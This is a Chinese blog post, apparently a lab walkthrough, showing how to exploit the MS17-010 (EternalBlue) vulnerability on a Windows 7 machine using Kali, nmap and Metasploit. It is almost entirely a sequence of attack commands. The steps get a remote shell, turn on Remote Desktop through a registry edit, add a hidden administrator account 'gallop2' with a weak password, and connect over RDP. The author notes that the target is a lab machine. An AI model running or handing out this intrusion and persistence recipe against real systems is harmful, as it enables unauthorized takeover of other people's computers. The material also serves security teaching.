ms17-010(永恒之蓝)漏洞利用

kali利用ms17-010获取win7权限

环境介绍

攻击机:kali(ip:192.168.133.136)
靶机:win7(ip:192.168.133.138)
靶机条件:靶机开启了445和3389端口,防火墙关闭

利用过程

1.用nmap扫描ip漏洞

nmap --script vuln 192.168.133.138  //扫描ip漏洞

在这里插入图片描述
2.msfconsole集成了很多漏洞的利用脚本

msfconsole  //漏洞利用

在这里插入图片描述
3.搜索ms17-010相关模块

search ms17-010   //搜索ms17-010

在这里插入图片描述
4.使用模块

use 2       //使用模块

在这里插入图片描述
5.设置目标ip或网段

set rhosts 192.168.133.138  //设置目标ip或网段

在这里插入图片描述
6.查看设置选项

show options //查看设置选项

我们这里的有效载荷是windows,如果是generic(通用的)有可能会攻击失败,我们可以通过改变端口号来解决
在这里插入图片描述
在这里插入图片描述

7.改变端口号

set lport 1017   //改变端口号

在这里插入图片描述

8.攻击

run //攻击

在这里插入图片描述
9.拿win7管理员权限

shell//拿权限

在这里插入图片描述

10.看到有乱码,所以通过以下代码解决乱码问题

chcp 65001 //改变乱码

在这里插入图片描述

11.查看端口进程占用

netstat -ano  //查看端口进程占用

在这里插入图片描述

12.开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f   //开启3389端口

在这里插入图片描述

13.查看3389端口是否开启

netstat -an|find "3389"  //查看3389端口是否开启

在这里插入图片描述

14.添加用户名gallop2 密码123456(根据自己喜好输入用户名和密码)

net user gallop2 123456 /add  //添加用户gallop2 密码123456

在这里插入图片描述

15.将gallop2用户添加到管理员组

net localgroup administrators gallop2 /add    //将gallop2用户添加到管理员组

在这里插入图片描述

16.这里是个简单的弹窗指令,在kali输入后win7会弹出一个窗口,当然也可以输入一些其他的指令来实现其他功能

msg /server:192.168.133.138 * "hello bro"   //弹窗

在这里插入图片描述
在这里插入图片描述

17.退回到kali普通用户执行以下代码,如果是管理员用户可能不成功

rdesktop 192.168.133.138

管理员用户执行不成功
在这里插入图片描述
普通用户执行后出现远程连接界面
在这里插入图片描述
18.这里因为是靶机所以可以直接连接,如果是别人的电脑切记不可,如果对方开启防火墙现在很难检测到445端口
在这里插入图片描述
在这里插入图片描述
19.连接成功
在这里插入图片描述

总结

现在只要没有关闭封火墙基本都不会被检测到445端口,但是类似于ms17-010的漏洞依然可以被利用侵入电脑,所以我们还是要合理利用电脑不要登录一些非法的不健康的网站,以免被有心之人所利用。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gallopsec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值